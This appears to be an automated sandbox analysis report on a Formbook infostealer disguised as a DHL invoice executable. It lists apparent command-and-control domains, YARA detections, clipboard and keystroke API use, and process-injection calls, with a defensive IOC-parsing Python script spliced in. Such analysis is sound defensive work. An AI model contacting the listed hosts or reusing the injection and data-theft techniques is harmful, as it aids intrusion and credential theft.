Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.00000000078F1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.869194618.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.350006795.0000000007972000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349644935.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000003.00000002.868840236.000000000260D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.349305261.000000000260E000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thepowerofzeus.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thepowerofzeus.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thepowerofzeus.com/jd21/www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.thepowerofzeus.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tyumk.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tyumk.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tyumk.xyz/jd21/www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.tyumk.xyzReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uhug.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uhug.xyz/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uhug.xyz/jd21/www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://www.uhug.xyzReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.868529966.00000000001D6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
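The URL strings above come out of the memory dump with neighbouring data fused onto them: a trailing "Referer:" header fragment, a second URL run directly into the first, or the next hostname of a list right after the shared "/jd21/" path. The Python below is an added example, not part of this report or of the sandbox's own tooling: it parses lines in the format shown, separates those fragments, and groups hosts by the URI path they share, which is the property that sets the C2 candidates apart from the Mozilla and Piriform strings. Reading a trailing hostname as the next entry of an adjacent host list is an assumption about the memory layout, and the sample lines are copied from this section with the source column shortened.

```python
from __future__ import annotations

import re
from collections import defaultdict
from urllib.parse import urlsplit

# Constructed sample: "String found in binary or memory" lines taken from the
# report section above, with the long source column shortened to one dump id.
REPORT_LINES = """\
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.thepowerofzeus.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.thepowerofzeus.com/jd21/
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.thepowerofzeus.com/jd21/www.alivioquantico.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.thepowerofzeus.comReferer:
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.tyumk.xyz/jd21/www.amsya.com
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.uhug.xyz/jd21/www.crucka.xyz
Source: explorer.exe, 00000003.00000002.869588514.0000000007972000.sdmp String found in binary or memory: http://www.uhug.xyzReferer:
Source: explorer.exe, 00000003.00000000.348892322.00000000001D6000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: explorer.exe, 00000003.00000002.869588514.00000000078E6000.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
"""

URL_RE = re.compile(r"String found in binary or memory:\s+(https?://\S+)")
# a last path segment that is itself a bare hostname, e.g. "www.amsya.com"
HOST_RE = re.compile(r"^(?:[a-z0-9-]+\.)+[a-z]{2,}$", re.I)
# header fragments that sit right behind a URL in memory and get fused onto it
FUSED_SUFFIXES = ("Referer:",)


def clean_url(raw: str) -> str:
    """Drop header text that the string scanner fused onto the URL."""
    for junk in FUSED_SUFFIXES:
        if raw.endswith(junk):
            raw = raw[: -len(junk)]
    return raw


def extract_urls(text: str) -> list[str]:
    """All URL strings in the report lines, one per URL even when two were
    stored back-to-back in memory and came out as a single token."""
    urls = []
    for token in URL_RE.findall(text):
        for piece in re.split(r"(?=https?://)", token):
            if piece:
                urls.append(clean_url(piece))
    return urls


def split_entry(url: str):
    """Return (host, path, next_host). When the last path segment looks like a
    hostname it is read as the next entry of an adjacent host list (an
    assumption about the memory layout), not as part of the path."""
    parts = urlsplit(url)
    path = parts.path or "/"
    segs = path.split("/")
    next_host = None
    if len(segs) > 2 and HOST_RE.match(segs[-1]):
        next_host = segs[-1].lower()
        path = "/".join(segs[:-1]) + "/"
    return parts.hostname.lower(), path, next_host


def shared_path_hosts(text: str, min_hosts: int = 2) -> dict[str, list[str]]:
    """Paths that several unrelated hosts share. One URI path reused across
    otherwise unrelated domains is the pattern worth extracting as C2 IOCs;
    hosts that appear only as the 'next entry' after such a path are added to
    the same group. Returns {path: sorted hosts}."""
    hosts_by_path: dict[str, set[str]] = defaultdict(set)
    next_by_path: dict[str, set[str]] = defaultdict(set)
    for url in extract_urls(text):
        host, path, nxt = split_entry(url)
        hosts_by_path[path].add(host)
        if nxt:
            next_by_path[path].add(nxt)
    return {
        path: sorted(hosts | next_by_path[path])
        for path, hosts in hosts_by_path.items()
        if path != "/" and len(hosts) >= min_hosts
    }


if __name__ == "__main__":
    for path, hosts in shared_path_hosts(REPORT_LINES).items():
        print(path)
        for h in hosts:
            print("  ", h)
```

Run against the full section, the same grouping yields the "/jd21/" host list and leaves the Mozilla and Piriform strings out because no second host shares their paths; the fused "ccleanerxe" remains a one-host path and should be checked by hand rather than repaired by the script.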
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012BEAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 0_2_012BEAFF
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012BED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 0_2_012BED6A
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012AAB9C GetKeyState,GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, 0_2_012AAB9C
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Code function: 0_2_012D9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 0_2_012D9576

E-Banking Fraud

Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 2.2.svchost.exe.400000.1.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe.1c0000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356899843.0000000000110000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356943162.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868511294.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868524955.00000000001A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.348709027.00000000001C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.868540226.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.356953040.0000000000480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe PID: 2412, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: svchost.exe PID: 236, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: cscript.exe PID: 1368, type: MEMORYSTR Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe String found in binary or memory: This is a third-party compiled AutoIt script.
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_22b1eab7-2
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe, 00000000.00000002.348989262.0000000001302000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a398b267-a
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe String found in binary or memory: This is a third-party compiled AutoIt script. memstr_0ace506a-3
Source: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_206c2ff5-4
Source: initial sample Static PE information: Filename: COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe
Source: C:\Users\user\Desktop\COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\cscript.exe Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A350 NtCreateFile, 2_2_0041A350
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A400 NtReadFile, 2_2_0041A400
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A480 NtClose, 2_2_0041A480
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A530 NtAllocateVirtualMemory, 2_2_0041A530
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041A47A NtClose, 2_2_0041A47A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00730078 NtResumeThread,LdrInitializeThunk, 2_2_00730078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00730048 NtProtectVirtualMemory,LdrInitializeThunk, 2_2_00730048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007300C4 NtCreateFile,LdrInitializeThunk, 2_2_007300C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072F900 NtReadFile,LdrInitializeThunk, 2_2_0072F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072F9F0 NtClose,LdrInitializeThunk, 2_2_0072F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FAE8 NtQueryInformationProcess,LdrInitializeThunk, 2_2_0072FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 2_2_0072FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FB68 NtFreeVirtualMemory,LdrInitializeThunk, 2_2_0072FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FBB8 NtQueryInformationToken,LdrInitializeThunk, 2_2_0072FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FC60 NtMapViewOfSection,LdrInitializeThunk, 2_2_0072FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FC90 NtUnmapViewOfSection,LdrInitializeThunk, 2_2_0072FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FDC0 NtQuerySystemInformation,LdrInitializeThunk, 2_2_0072FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FD8C NtDelayExecution,LdrInitializeThunk, 2_2_0072FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 2_2_0072FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FEA0 NtReadVirtualMemory,LdrInitializeThunk, 2_2_0072FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FFB4 NtCreateSection,LdrInitializeThunk, 2_2_0072FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00730060 NtQuerySection, 2_2_00730060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0073010C NtOpenDirectoryObject, 2_2_0073010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007301D4 NtSetValueKey, 2_2_007301D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007307AC NtCreateMutant, 2_2_007307AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00730C40 NtGetContextThread, 2_2_00730C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_007310D0 NtOpenProcessToken, 2_2_007310D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00731148 NtOpenThread, 2_2_00731148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072F8CC NtWaitForSingleObject, 2_2_0072F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00731930 NtSetContextThread, 2_2_00731930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072F938 NtWriteFile, 2_2_0072F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FA50 NtEnumerateValueKey, 2_2_0072FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FA20 NtQueryInformationFile, 2_2_0072FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FAB8 NtQueryValueKey, 2_2_0072FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FB50 NtCreateKey, 2_2_0072FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FBE8 NtQueryVirtualMemory, 2_2_0072FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FC48 NtSetInformationFile, 2_2_0072FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FC30 NtOpenProcess, 2_2_0072FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FD5C NtEnumerateKey, 2_2_0072FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00731D80 NtSuspendThread, 2_2_00731D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FE24 NtWriteVirtualMemory, 2_2_0072FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FF34 NtQueueApcThread, 2_2_0072FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0072FFFC NtCreateProcessEx, 2_2_0072FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose, 2_2_0038A036
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0038A042 NtQueryInformationProcess, 2_2_0038A042
Source: C:\Windows\explorer.exe Code function: 3_2_0909EE12 NtProtectVirtualMemory, 3_2_0909EE12
Source: C:\Windows\explorer.exe Code function: 3_2_0909D232 NtCreateFile, 3_2_0909D232
Source: C:\Windows\explorer.exe Code function: 3_2_0909EE0A NtProtectVirtualMemory, 3_2_0909EE0A
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020900C4 NtCreateFile,LdrInitializeThunk, 4_2_020900C4
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_020907AC NtCreateMutant,LdrInitializeThunk, 4_2_020907AC
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FAB8 NtQueryValueKey,LdrInitializeThunk, 4_2_0208FAB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 4_2_0208FAD0
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FAE8 NtQueryInformationProcess,LdrInitializeThunk, 4_2_0208FAE8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FB50 NtCreateKey,LdrInitializeThunk, 4_2_0208FB50
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FB68 NtFreeVirtualMemory,LdrInitializeThunk, 4_2_0208FB68
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208FBB8 NtQueryInformationToken,LdrInitializeThunk, 4_2_0208FBB8
Source: C:\Windows\SysWOW64\cscript.exe Code function: 4_2_0208F900 NtReadFile,LdrInitializeThunk, 4_2_0208F900
